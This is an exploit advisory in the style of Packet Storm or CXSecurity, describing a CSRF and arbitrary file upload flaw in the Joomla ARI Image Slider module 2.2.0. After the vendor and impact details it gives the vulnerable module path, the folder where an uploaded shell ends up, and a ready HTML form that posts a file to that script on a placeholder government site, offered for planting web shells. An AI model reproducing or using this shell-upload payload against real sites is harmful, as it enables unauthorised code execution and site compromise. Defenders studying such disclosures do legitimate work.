Joomla ARI Image Slider 2.2.0 CSRF Backdoor Access Vuln

1. ##################################################################################
2.  
3. # Exploit Title : Joomla ARI Image Slider 2.2.0 CSRF Backdoor Access Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 27/03/2019
7. # Vendor Homepage : ari-soft.com
8. # Software Download Link : ari-soft.com/Joomla-Components/ARI-Image-Slider/Detailed-product-flyer.html
9. # Software Information Link : extensions.joomla.org/extension/ari-image-slider/
10. # Software Affected Version : 2.2.0 and lower versions / Compatible with Joomla 2.x and 3.x
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
18. # Reference Link : cxsecurity.com/ascii/WLB-2019030223
19.  
20. ##################################################################################
21.  
22. # Description about Software :
23. ***************************
24. ARI Image Slider module is based on Nivo Slider jQuery plugin and provides possibility to create
25.  
26. responsive image slideshow using photos from the selected folders and it is designed for Joomla CMS.
27.  
28. ##################################################################################
29.  
30. # Impact :
31. ***********
32. Joomla ARI Image Slider 2.2.0 => The web application does not, or can not, sufficiently
33.  
34. verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.
35.  
36. When a web server is designed to receive a request from a client without any mechanism for verifying that it was
37.  
38. intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the
39.  
40. web server which will be treated as an authentic request. This can be done via a URL, image load,
41.  
42. XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.
43.  
44. Joomla ARI Image Slider 2.2.0 => is prone to a vulnerability that lets attackers upload arbitrary files.
45.  
46. The issue occurs because the application fails to adequately sanitize user-supplied input.
47.  
48. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result
49.  
50. in arbitrary code execution within the context of the vulnerable application.
51.  
52. ##################################################################################
53.  
54. # Vulnerable File :
55. ****************
56. /mod_ariimageslidersa.php
57.  
58. # Vulnerability :
59. **************
60. /modules/mod_ariimageslidersa/mod_ariimageslidersa.php
61.  
62. # Directory File Path :
63. *******************
64. /modules/mod_ariimageslidersa/[YOURSHELLNAME].php
65.  
66. # CSRF Cross Site Request Forgery Exploiter / Shell Upload :
67. ******************************************************
68. <form enctype="multipart/form-data" action="https://www.[VULNERABLESITE].gov/modules/mod_ariimageslidersa/mod_ariimageslidersa.php"
69. method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />Select Your File :
70. <input name="userfile" type="file" /><input type="submit" value="Upload" /></form>Cyberizm
71.  
72. ##################################################################################
73.  
74. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
75.  
76. ##################################################################################